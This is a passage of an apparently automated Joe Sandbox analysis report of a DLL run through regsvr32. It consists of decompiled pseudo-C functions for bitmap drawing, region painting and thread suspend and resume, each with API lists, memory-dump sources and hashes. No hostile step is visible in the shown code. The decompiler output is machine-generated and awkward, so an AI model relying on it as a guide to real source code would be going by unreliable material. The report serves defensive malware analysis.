                                                                                                                							_a4 = GetSysColor( *_t101) & 0x000000ff;
                                                                                                                							GetSysColor( *_t101);
                                                                                                                							_a4 = _a4 << 8;
                                                                                                                							_t63 = GetSysColor( *_t101) >> 0x00000010 & 0x000000ff | _a4;
                                                                                                                							__eflags = _t63;
                                                                                                                							 *_v8 = _t63;
                                                                                                                							_t56 = _v12;
                                                                                                                						} else {
                                                                                                                							__eflags =  *(0x1005c028 + _t92 * 8) - 0x12;
                                                                                                                							if(__eflags != 0) {
                                                                                                                								 *_t82 = 0xffffff;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						L12:
                                                                                                                						_a8 = _a8 + 1;
                                                                                                                					} while (_a8 < 0x10);
                                                                                                                					_t102 = _t104->bmiHeader.biWidth;
                                                                                                                					_t79 = _t104->bmiHeader.biHeight;
                                                                                                                					_a4 = _t102;
                                                                                                                					_a8 = _t79;
                                                                                                                					_t64 = GetDC(0);
                                                                                                                					_a12 = _t64;
                                                                                                                					_t65 = CreateCompatibleBitmap(_t64, _t102, _t79);
                                                                                                                					_v8 = _t65;
                                                                                                                					if(_t65 != 0) {
                                                                                                                						_t69 = CreateCompatibleDC(_a12);
                                                                                                                						_t102 = SelectObject;
                                                                                                                						_t79 = _t69;
                                                                                                                						_v12 = SelectObject(_t79, _v8);
                                                                                                                						StretchDIBits(_t79, 0, 0, _a4, _a8, 0, 0, _a4, _a8, _v16 + 0x28 + (1 << _t104->bmiHeader.biBitCount) * 4, _t104, 0, 0xcc0020);
                                                                                                                						SelectObject(_t79, _v12);
                                                                                                                						DeleteDC(_t79);
                                                                                                                					}
                                                                                                                					ReleaseDC(0, _a12);
                                                                                                                					_push(_t104);
                                                                                                                					E1003B59D(_t79, _t102, _t104, 0);
                                                                                                                					FreeResource(_v20);
                                                                                                                					_t53 = _v8;
                                                                                                                					goto L16;
                                                                                                                				}
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • LoadResource.KERNEL32(?,?), ref: 10026F5D
                                                                                                                • LockResource.KERNEL32(00000000), ref: 10026F70
                                                                                                                • _malloc.LIBCMT ref: 10026F8B
                                                                                                                  • Part of subcall function 1003B4DA: __FF_MSGBANNER.LIBCMT ref: 1003B4FD
                                                                                                                  • Part of subcall function 1003B4DA: __NMSG_WRITE.LIBCMT ref: 1003B504
                                                                                                                  • Part of subcall function 1003B4DA: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,10046716,?,00000001,00000001,10043228,00000018,10069028,0000000C,100432B7,00000001), ref: 1003B552
                                                                                                                  • Part of subcall function 100161B4: _memcpy_s.LIBCMT ref: 100161C4
                                                                                                                • GetSysColor.USER32 ref: 10026FF7
                                                                                                                • GetSysColor.USER32 ref: 10027001
                                                                                                                • GetSysColor.USER32 ref: 10027013
                                                                                                                • GetDC.USER32(00000000), ref: 1002703D
                                                                                                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 10027049
                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 10027059
                                                                                                                • SelectObject.GDI32(00000000,?), ref: 1002706B
                                                                                                                • StretchDIBits.GDI32(00000000,00000000,00000000,00000008,00000010,00000000,00000000,00000008,00000010,?,00000000,00000000,00CC0020), ref: 1002709A
                                                                                                                • SelectObject.GDI32(00000000,00000008), ref: 100270A4
                                                                                                                • DeleteDC.GDI32(00000000), ref: 100270A7
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 100270B2
                                                                                                                • FreeResource.KERNEL32(00000000), ref: 100270C2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ColorResource$CompatibleCreateObjectSelect$AllocateBitmapBitsDeleteFreeHeapLoadLockReleaseStretch_malloc_memcpy_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 2870220007-0
                                                                                                                • Opcode ID: 932c64eb8eb1807fe5a179f52783c9bc902c822c0fd8cf1ffe2fc1f6be497539
                                                                                                                • Instruction ID: 13da0a14aeafbeb5acb813e38c8887ee3a3bc1eec43f6851fe9542ec9df1e041
                                                                                                                • Opcode Fuzzy Hash: 932c64eb8eb1807fe5a179f52783c9bc902c822c0fd8cf1ffe2fc1f6be497539
                                                                                                                • Instruction Fuzzy Hash: 13416A75900218EFEB41DFA5DC84DAE7BB9FF48350F108429F91997261DB31DA14DB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 91%
                                                                                                                			E10014DC0(struct HDC__* _a4) {
                                                                                                                				int _v4;
                                                                                                                				int _v12;
                                                                                                                				void _v40;
                                                                                                                				int _v44;
                                                                                                                				int _v48;
                                                                                                                				struct HDC__* _v52;
                                                                                                                				char _v56;
                                                                                                                				struct HDC__* _v64;
                                                                                                                				void* _v68;
                                                                                                                				int _v80;
                                                                                                                				int _v84;
                                                                                                                				char _v104;
                                                                                                                				char _v112;
                                                                                                                				signed int _t85;
                                                                                                                				intOrPtr _t89;
                                                                                                                				struct HDC__* _t90;
                                                                                                                				void* _t97;
                                                                                                                				void* _t109;
                                                                                                                				int _t123;
                                                                                                                				signed int _t129;
                                                                                                                				signed short _t155;
                                                                                                                				struct HDC__* _t160;
                                                                                                                				int _t162;
                                                                                                                				void* _t165;
                                                                                                                
                                                                                                                				_push(0xffffffff);
                                                                                                                				_push(E10052880);
                                                                                                                				_push( *[fs:0x0]);
                                                                                                                				_push(_t123);
                                                                                                                				_push(1);
                                                                                                                				_t85 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_push(_t85 ^ _t165 - 0x00000034);
                                                                                                                				 *[fs:0x0] =  &_v12;
                                                                                                                				_t160 = _a4;
                                                                                                                				while(1) {
                                                                                                                					_t162 = 0;
                                                                                                                					if( *((intOrPtr*)(_t160 + 0x1c)) >= 5) {
                                                                                                                						 *((intOrPtr*)(_t160 + 0x1c)) = 0;
                                                                                                                					}
                                                                                                                					E10023F76( &_v52);
                                                                                                                					_t89 =  *((intOrPtr*)(_t160 + 0x20));
                                                                                                                					_t168 = _t89 - _t162;
                                                                                                                					_v4 = _t162;
                                                                                                                					if(_t89 != _t162) {
                                                                                                                						_t90 =  *(_t89 + 4);
                                                                                                                					} else {
                                                                                                                						_t90 = 0;
                                                                                                                					}
                                                                                                                					E1002452E( &_v56, 1, _t162, CreateCompatibleDC(_t90));
                                                                                                                					_v64 = _t162;
                                                                                                                					_v68 = 0x100572e4;
                                                                                                                					_v12 = 1;
                                                                                                                					_t155 =  *((intOrPtr*)(_t160 + 0x1c)) + 0xaf;
                                                                                                                					E100247F5( &_v68, _t155, _t162, LoadBitmapA( *(E10023187(_t123, _t155, _t160, _t168) + 0xc), _t155 & 0x0000ffff));
                                                                                                                					_t97 = _v68;
                                                                                                                					if(_t97 != _t162) {
                                                                                                                						SelectObject(_v52, _t97);
                                                                                                                						_t97 = _v68;
                                                                                                                					}
                                                                                                                					GetObjectA(_t97, 0x18,  &_v40);
                                                                                                                					_t123 = GetSystemMetrics(_t162);
                                                                                                                					_v80 = _t123;
                                                                                                                					_t129 = GetSystemMetrics(1);
                                                                                                                					_v12 = _t129;
                                                                                                                					if( *(_t160 + 0x14) > (0x66666667 * _t123 >> 0x20 >> 1 >> 0x1f) + (0x66666667 * _t123 >> 0x20 >> 1)) {
                                                                                                                						 *(_t160 + 0x14) = _t162;
                                                                                                                					}
                                                                                                                					if( *(_t160 + 0x18) > (0x66666667 * _t129 >> 0x20 >> 1 >> 0x1f) + (0x66666667 * _t129 >> 0x20 >> 1)) {
                                                                                                                						 *(_t160 + 0x18) = _t162;
                                                                                                                					}
                                                                                                                					if( *(_t160 + 0x10) > 1) {
                                                                                                                						 *(_t160 + 0x10) = _t162;
                                                                                                                					}
                                                                                                                					_t109 =  *(_t160 + 0x10) - _t162;
                                                                                                                					if(_t109 == 0) {
                                                                                                                						goto L21;
                                                                                                                					}
                                                                                                                					if(_t109 != 1) {
                                                                                                                						L26:
                                                                                                                						 *(_t160 + 0x14) =  *(_t160 + 0x14) + 0x3c;
                                                                                                                						 *(_t160 + 0x18) =  *(_t160 + 0x18) + 0x14;
                                                                                                                						 *(_t160 + 0x10) =  *(_t160 + 0x10) + 1;
                                                                                                                						Sleep(0xbb8);
                                                                                                                						BitBlt( *( *((intOrPtr*)(_t160 + 0x20)) + 4), _t162, _t162, _v80, _v12, _v64, _t162, _t162, 0x42);
                                                                                                                						E10024592( &_v104);
                                                                                                                						 *((intOrPtr*)(_t160 + 0x1c)) =  *((intOrPtr*)(_t160 + 0x1c)) + 1;
                                                                                                                						_v56 = 0;
                                                                                                                						_v112 = 0x100572c4;
                                                                                                                						E10024848( &_v112);
                                                                                                                						_v56 = 0xffffffff;
                                                                                                                						E100245A8( &_v104);
                                                                                                                						continue;
                                                                                                                					}
                                                                                                                					_t123 = _v44;
                                                                                                                					 *(_t160 + 0xc) = _t123;
                                                                                                                					if(_t123 <= _t162) {
                                                                                                                						goto L26;
                                                                                                                					}
                                                                                                                					while(1) {
                                                                                                                						BitBlt(_a4,  *(_t160 + 0x14),  *(_t160 + 0x18), _v48, _t123, _v64,  *(_t160 + 8),  *(_t160 + 0xc), 0xcc0020);
                                                                                                                						 *(_t160 + 0xc) =  *(_t160 + 0xc) + 0xffffffff;
                                                                                                                						if( *(_t160 + 0xc) <= 0) {
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						_t123 = _v80;
                                                                                                                					}
                                                                                                                					L25:
                                                                                                                					_t162 = 0;
                                                                                                                					goto L26;
                                                                                                                					L21:
                                                                                                                					_t123 = _v48;
                                                                                                                					__eflags = _t123 - _t162;
                                                                                                                					 *(_t160 + 8) = _t123;
                                                                                                                					if(_t123 <= _t162) {
                                                                                                                						goto L26;
                                                                                                                					}
                                                                                                                					while(1) {
                                                                                                                						BitBlt(_a4,  *(_t160 + 0x14),  *(_t160 + 0x18), _t123, _v44, _v64,  *(_t160 + 8),  *(_t160 + 0xc), 0xcc0020);
                                                                                                                						 *(_t160 + 8) =  *(_t160 + 8) + 0xffffffff;
                                                                                                                						__eflags =  *(_t160 + 8);
                                                                                                                						if( *(_t160 + 8) <= 0) {
                                                                                                                							goto L25;
                                                                                                                						}
                                                                                                                						_t123 = _v84;
                                                                                                                					}
                                                                                                                					goto L25;
                                                                                                                				}
                                                                                                                			}




























                                                                                                                APIs
                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 10014E17
                                                                                                                • LoadBitmapA.USER32 ref: 10014E4E
                                                                                                                • SelectObject.GDI32(?,?), ref: 10014E6C
                                                                                                                • GetObjectA.GDI32(?,00000018,?), ref: 10014E7E
                                                                                                                • GetSystemMetrics.USER32 ref: 10014E8B
                                                                                                                • GetSystemMetrics.USER32 ref: 10014E95
                                                                                                                • BitBlt.GDI32(?,0000003C,00000014,?,?,?,?,?,00CC0020), ref: 10014F2B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MetricsObjectSystem$BitmapCompatibleCreateLoadSelect
                                                                                                                • String ID: gfff$gfff
                                                                                                                • API String ID: 2961984297-3084402119
                                                                                                                • Opcode ID: ac3882323fa1f9907e88c189e5f53906dab6768ff79bb1aade700cb96182447b
                                                                                                                • Instruction ID: 9e04ff40dbcebb2e158ec9be94f1c2a7de3d33684d6e6af9c12f35c4c222073b
                                                                                                                • Opcode Fuzzy Hash: ac3882323fa1f9907e88c189e5f53906dab6768ff79bb1aade700cb96182447b
                                                                                                                • Instruction Fuzzy Hash: F36178B51047459FC320CF69D98491BB7F8FB88310F118A1DF5968B6A1DB70F945CBA2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 98%
                                                                                                                			E10024D04(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				void* _t135;
                                                                                                                				intOrPtr _t194;
                                                                                                                				intOrPtr* _t228;
                                                                                                                				void* _t230;
                                                                                                                				intOrPtr _t233;
                                                                                                                
                                                                                                                				_push(0x38);
                                                                                                                				E1003D1E6(E10053A08, __ebx, __edi, __esi);
                                                                                                                				_t228 = __ecx;
                                                                                                                				 *((intOrPtr*)(_t230 - 0x30)) = 0;
                                                                                                                				 *((intOrPtr*)(_t230 - 0x34)) = 0x1005bb60;
                                                                                                                				 *(_t230 - 4) = 0;
                                                                                                                				 *((intOrPtr*)(_t230 - 0x28)) = 0;
                                                                                                                				 *((intOrPtr*)(_t230 - 0x2c)) = 0x1005bb60;
                                                                                                                				 *((intOrPtr*)(_t230 - 0x20)) = 0;
                                                                                                                				 *((intOrPtr*)(_t230 - 0x24)) = 0x1005bb60;
                                                                                                                				 *(_t230 - 4) = 2;
                                                                                                                				E10024AE5(_t230 - 0x2c,  *(_t230 + 8));
                                                                                                                				CopyRect(_t230 - 0x44,  *(_t230 + 8));
                                                                                                                				InflateRect(_t230 - 0x44,  ~( *(_t230 + 0xc)),  ~( *(_t230 + 0x10)));
                                                                                                                				IntersectRect(_t230 - 0x44, _t230 - 0x44,  *(_t230 + 8));
                                                                                                                				E100247F5(_t230 - 0x24, 0x1005bb60, _t230, CreateRectRgnIndirect(_t230 - 0x44));
                                                                                                                				E100247F5(_t230 - 0x34, 0x1005bb60, _t230, CreateRectRgn(0, 0, 0, 0));
                                                                                                                				E10024B19(_t230 - 0x34, _t230 - 0x2c, _t230 - 0x24, 3);
                                                                                                                				_t232 =  *((intOrPtr*)(_t230 + 0x20));
                                                                                                                				if( *((intOrPtr*)(_t230 + 0x20)) == 0) {
                                                                                                                					 *((intOrPtr*)(_t230 + 0x20)) = E10024C61(0, 0x1005bb60, _t228, _t232);
                                                                                                                				}
                                                                                                                				_t194 =  *((intOrPtr*)(_t230 + 0x20));
                                                                                                                				_t233 = _t194;
                                                                                                                				_t234 = _t233 == 0;
                                                                                                                				if(_t233 == 0) {
                                                                                                                					E1001729E(0, _t194, 0x1005bb60, _t228, _t234);
                                                                                                                				}
                                                                                                                				if( *((intOrPtr*)(_t230 + 0x24)) == 0) {
                                                                                                                					 *((intOrPtr*)(_t230 + 0x24)) = _t194;
                                                                                                                				}
                                                                                                                				 *((intOrPtr*)(_t230 - 0x18)) = 0;
                                                                                                                				 *((intOrPtr*)(_t230 - 0x1c)) = 0x1005bb60;
                                                                                                                				 *((intOrPtr*)(_t230 - 0x10)) = 0;
                                                                                                                				 *((intOrPtr*)(_t230 - 0x14)) = 0x1005bb60;
                                                                                                                				 *(_t230 - 4) = 4;
                                                                                                                				if( *(_t230 + 0x14) != 0) {
                                                                                                                					E100247F5(_t230 - 0x1c, CreateRectRgn, _t230, CreateRectRgn(0, 0, 0, 0));
                                                                                                                					E10024AFE(_t230 - 0x2c,  *(_t230 + 0x14));
                                                                                                                					CopyRect(_t230 - 0x44,  *(_t230 + 0x14));
                                                                                                                					InflateRect(_t230 - 0x44,  ~( *(_t230 + 0x18)),  ~( *(_t230 + 0x1c)));
                                                                                                                					IntersectRect(_t230 - 0x44, _t230 - 0x44,  *(_t230 + 0x14));
                                                                                                                					E10024AFE(_t230 - 0x24, _t230 - 0x44);
                                                                                                                					E10024B19(_t230 - 0x1c, _t230 - 0x2c, _t230 - 0x24, 3);
                                                                                                                					if( *((intOrPtr*)( *((intOrPtr*)(_t230 + 0x20)) + 4)) ==  *((intOrPtr*)( *((intOrPtr*)(_t230 + 0x24)) + 4))) {
                                                                                                                						E100247F5(_t230 - 0x14, CreateRectRgn, _t230, CreateRectRgn(0, 0, 0, 0));
                                                                                                                						E10024B19(_t230 - 0x14, _t230 - 0x1c, _t230 - 0x34, 3);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				if( *((intOrPtr*)( *((intOrPtr*)(_t230 + 0x20)) + 4)) !=  *((intOrPtr*)( *((intOrPtr*)(_t230 + 0x24)) + 4)) &&  *(_t230 + 0x14) != 0) {
                                                                                                                					E10024234(_t228, _t230 - 0x1c);
                                                                                                                					 *((intOrPtr*)( *_t228 + 0x50))(_t230 - 0x44);
                                                                                                                					 *(_t230 + 0x14) = E100248CD(_t228,  *((intOrPtr*)(_t230 + 0x24)));
                                                                                                                					PatBlt( *(_t228 + 4),  *(_t230 - 0x44),  *(_t230 - 0x40),  *((intOrPtr*)(_t230 - 0x3c)) -  *(_t230 - 0x44),  *((intOrPtr*)(_t230 - 0x38)) -  *(_t230 - 0x40), 0x5a0049);
                                                                                                                					E100248CD(_t228,  *(_t230 + 0x14));
                                                                                                                				}
                                                                                                                				_t135 = _t230 - 0x14;
                                                                                                                				if( *((intOrPtr*)(_t230 - 0x10)) == 0) {
                                                                                                                					_t135 = _t230 - 0x34;
                                                                                                                				}
                                                                                                                				E10024234(_t228, _t135);
                                                                                                                				 *((intOrPtr*)( *_t228 + 0x50))(_t230 - 0x44);
                                                                                                                				 *(_t230 + 0x14) = E100248CD(_t228,  *((intOrPtr*)(_t230 + 0x20)));
                                                                                                                				PatBlt( *(_t228 + 4),  *(_t230 - 0x44),  *(_t230 - 0x40),  *((intOrPtr*)(_t230 - 0x3c)) -  *(_t230 - 0x44),  *((intOrPtr*)(_t230 - 0x38)) -  *(_t230 - 0x40), 0x5a0049);
                                                                                                                				if( *(_t230 + 0x14) != 0) {
                                                                                                                					E100248CD(_t228,  *(_t230 + 0x14));
                                                                                                                				}
                                                                                                                				E10024234(_t228, 0);
                                                                                                                				 *(_t230 - 4) = 3;
                                                                                                                				 *((intOrPtr*)(_t230 - 0x14)) = 0x100572c4;
                                                                                                                				E10024848(_t230 - 0x14);
                                                                                                                				 *(_t230 - 4) = 2;
                                                                                                                				 *((intOrPtr*)(_t230 - 0x1c)) = 0x100572c4;
                                                                                                                				E10024848(_t230 - 0x1c);
                                                                                                                				 *(_t230 - 4) = 1;
                                                                                                                				 *((intOrPtr*)(_t230 - 0x24)) = 0x100572c4;
                                                                                                                				E10024848(_t230 - 0x24);
                                                                                                                				 *(_t230 - 4) = 0;
                                                                                                                				 *((intOrPtr*)(_t230 - 0x2c)) = 0x100572c4;
                                                                                                                				E10024848(_t230 - 0x2c);
                                                                                                                				 *(_t230 - 4) =  *(_t230 - 4) | 0xffffffff;
                                                                                                                				 *((intOrPtr*)(_t230 - 0x34)) = 0x100572c4;
                                                                                                                				return E1003D2BE(E10024848(_t230 - 0x34));
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10024D0B
                                                                                                                  • Part of subcall function 10024AE5: CreateRectRgnIndirect.GDI32(?), ref: 10024AEC
                                                                                                                • CopyRect.USER32(?,?), ref: 10024D44
                                                                                                                • InflateRect.USER32 ref: 10024D5A
                                                                                                                • IntersectRect.USER32(?,?,?), ref: 10024D68
                                                                                                                • CreateRectRgnIndirect.GDI32(?), ref: 10024D72
                                                                                                                • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 10024D85
                                                                                                                  • Part of subcall function 10024B19: CombineRgn.GDI32(?,?,00000002,?), ref: 10024B3C
                                                                                                                • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 10024DF1
                                                                                                                • CopyRect.USER32(?,?), ref: 10024E0E
                                                                                                                • InflateRect.USER32 ref: 10024E24
                                                                                                                • IntersectRect.USER32(?,?,?), ref: 10024E32
                                                                                                                • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 10024E68
                                                                                                                  • Part of subcall function 10024C61: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,?), ref: 10024CA7
                                                                                                                  • Part of subcall function 10024C61: CreatePatternBrush.GDI32(00000000), ref: 10024CB4
                                                                                                                  • Part of subcall function 10024C61: DeleteObject.GDI32(00000000), ref: 10024CC0
                                                                                                                • PatBlt.GDI32(00000004,?,?,?,?,005A0049), ref: 10024EDD
                                                                                                                  • Part of subcall function 100248CD: SelectObject.GDI32(?,00000000), ref: 100248EF
                                                                                                                  • Part of subcall function 100248CD: SelectObject.GDI32(?,00000004), ref: 10024905
                                                                                                                • PatBlt.GDI32(00000004,?,?,?,?,005A0049), ref: 10024F30
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$Create$Object$CopyIndirectInflateIntersectSelect$BitmapBrushCombineDeleteH_prolog3Pattern
                                                                                                                • String ID:
                                                                                                                • API String ID: 3342639795-0
                                                                                                                • Opcode ID: 038537a44a8000c016f0801a7796dbb464ad61361ae68357e3d626c0f94f19d1
                                                                                                                • Instruction ID: 35fdaccf589770054e1f4c58ce5c3dc5ce86ec9ee3b598ed1abc9f1a20bc61fe
                                                                                                                • Opcode Fuzzy Hash: 038537a44a8000c016f0801a7796dbb464ad61361ae68357e3d626c0f94f19d1
                                                                                                                • Instruction Fuzzy Hash: 899102B590014EAFCF05DFA4EA958EEBBB9FF08204F52411AF406A3251DF34AE05CB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 89%
                                                                                                                			E1000C640(signed int __ecx, void* __edx) {
                                                                                                                				long _v4;
                                                                                                                				char _v12;
                                                                                                                				char _v24;
                                                                                                                				char _v28;
                                                                                                                				char _v32;
                                                                                                                				long _v36;
                                                                                                                				char _v40;
                                                                                                                				void* __edi;
                                                                                                                				signed int _t53;
                                                                                                                				int _t58;
                                                                                                                				intOrPtr* _t59;
                                                                                                                				signed int _t64;
                                                                                                                				intOrPtr* _t79;
                                                                                                                				signed int _t84;
                                                                                                                				intOrPtr* _t93;
                                                                                                                				signed int _t118;
                                                                                                                				signed int _t132;
                                                                                                                				void* _t138;
                                                                                                                				signed int _t156;
                                                                                                                				void* _t161;
                                                                                                                				signed int _t162;
                                                                                                                				intOrPtr* _t166;
                                                                                                                				intOrPtr* _t173;
                                                                                                                
                                                                                                                				_t138 = __edx;
                                                                                                                				_push(0xffffffff);
                                                                                                                				_push(E10051920);
                                                                                                                				_push( *[fs:0x0]);
                                                                                                                				_t162 = _t161 - 0x18;
                                                                                                                				_t53 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_push(_t53 ^ _t162);
                                                                                                                				 *[fs:0x0] =  &_v12;
                                                                                                                				_t156 = __ecx;
                                                                                                                				_v36 = 0;
                                                                                                                				if(GetExitCodeThread( *(__ecx + 0x290),  &_v36) == 0 || _v36 != 0x103) {
                                                                                                                					L9:
                                                                                                                					_t139 =  *(_t156 + 0x294);
                                                                                                                					_t58 = GetExitCodeThread( *(_t156 + 0x294),  &_v36);
                                                                                                                					if(_t58 != 0 && _v36 == 0x103) {
                                                                                                                						_t59 = E100173A6();
                                                                                                                						_t173 = _t59;
                                                                                                                						_t111 = 0 | _t173 == 0x00000000;
                                                                                                                						if(_t173 == 0) {
                                                                                                                							_t59 = E10001000(_t111, _t139, 0x80004005);
                                                                                                                						}
                                                                                                                						_v28 =  *((intOrPtr*)( *((intOrPtr*)( *_t59 + 0xc))))() + 0x10;
                                                                                                                						_t153 = _t156 + 0x400;
                                                                                                                						_v4 = 1;
                                                                                                                						E1001ADCC(_t156 + 0x400, _t156 + 0x400,  &_v28);
                                                                                                                						_t64 = E1003BD06(_v32, 0x10058344);
                                                                                                                						_t162 = _t162 + 8;
                                                                                                                						if((_t64 & 0xffffff00 | _t64 == 0x00000000) == 0) {
                                                                                                                							ResumeThread( *(_t156 + 0x294));
                                                                                                                							ResumeThread( *(_t156 + 0x28c));
                                                                                                                							E1001D2C4(_t153, 0x10058344);
                                                                                                                							E10001310( &_v24, "Searching");
                                                                                                                							_t118 =  &_v32;
                                                                                                                							E1001614A(_t118);
                                                                                                                						} else {
                                                                                                                							SuspendThread( *(_t156 + 0x294));
                                                                                                                							SuspendThread( *(_t156 + 0x28c));
                                                                                                                							E1001D2C4(_t153, 0x10058450);
                                                                                                                							_t118 = _t156;
                                                                                                                							E1000BDC0(_t118);
                                                                                                                						}
                                                                                                                						_t58 = _v28 + 0xfffffff0;
                                                                                                                						_v4 = 0xffffffff;
                                                                                                                						asm("lock xadd [edx], ecx");
                                                                                                                						if((_t118 | 0xffffffff) - 1 <= 0) {
                                                                                                                							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t58)) + 4))))(_t58);
                                                                                                                						}
                                                                                                                					}
                                                                                                                					 *[fs:0x0] = _v12;
                                                                                                                					return _t58;
                                                                                                                				} else {
                                                                                                                					_t79 = E100173A6();
                                                                                                                					_t166 = _t79;
                                                                                                                					_t125 = 0 | _t166 == 0x00000000;
                                                                                                                					if(_t166 == 0) {
                                                                                                                						_t79 = E10001000(_t125, _t138, 0x80004005);
                                                                                                                					}
                                                                                                                					_v32 =  *((intOrPtr*)( *((intOrPtr*)( *_t79 + 0xc))))() + 0x10;
                                                                                                                					_v4 = 0;
                                                                                                                					_t154 = _t156 + 0x400;
                                                                                                                					E1001ADCC(_t156 + 0x400, _t156 + 0x400,  &_v32);
                                                                                                                					_t84 = E1003BD06(_v36, 0x10058344);
                                                                                                                					_t162 = _t162 + 8;
                                                                                                                					if((_t84 & 0xffffff00 | _t84 == 0x00000000) == 0) {
                                                                                                                						ResumeThread( *(_t156 + 0x290));
                                                                                                                						ResumeThread( *(_t156 + 0x28c));
                                                                                                                						E1001D2C4(_t154, 0x10058344);
                                                                                                                						E10001310( &_v32, "Searching");
                                                                                                                						_t132 =  &_v40;
                                                                                                                						E1001614A(_t132);
                                                                                                                					} else {
                                                                                                                						SuspendThread( *(_t156 + 0x290));
                                                                                                                						SuspendThread( *(_t156 + 0x28c));
                                                                                                                						E1001D2C4(_t154, 0x10058450);
                                                                                                                						_t132 = _t156;
                                                                                                                						E1000BDC0(_t132);
                                                                                                                					}
                                                                                                                					_t93 = _v32 + 0xfffffff0;
                                                                                                                					_v4 = 0xffffffff;
                                                                                                                					asm("lock xadd [edx], ecx");
                                                                                                                					if((_t132 | 0xffffffff) - 1 <= 0) {
                                                                                                                						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t93)) + 4))))(_t93);
                                                                                                                					}
                                                                                                                					goto L9;
                                                                                                                				}
                                                                                                                			}



























                                                                                                                APIs
                                                                                                                • GetExitCodeThread.KERNEL32(?,DF7C0CDA,DF7C0CDA), ref: 1000C681
                                                                                                                • SuspendThread.KERNEL32(?), ref: 1000C701
                                                                                                                • SuspendThread.KERNEL32(?), ref: 1000C70E
                                                                                                                • ResumeThread.KERNEL32(?), ref: 1000C730
                                                                                                                • ResumeThread.KERNEL32(?), ref: 1000C739
                                                                                                                  • Part of subcall function 1001D2C4: IsWindow.USER32(?), ref: 1001D2D3
                                                                                                                • GetExitCodeThread.KERNEL32(?,?), ref: 1000C799
                                                                                                                • SuspendThread.KERNEL32(?), ref: 1000C81D
                                                                                                                • SuspendThread.KERNEL32(?), ref: 1000C826
                                                                                                                • ResumeThread.KERNEL32(?), ref: 1000C844
                                                                                                                • ResumeThread.KERNEL32(?), ref: 1000C84D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Thread$ResumeSuspend$CodeExit$Window
                                                                                                                • String ID: Searching
                                                                                                                • API String ID: 1881788215-291028053
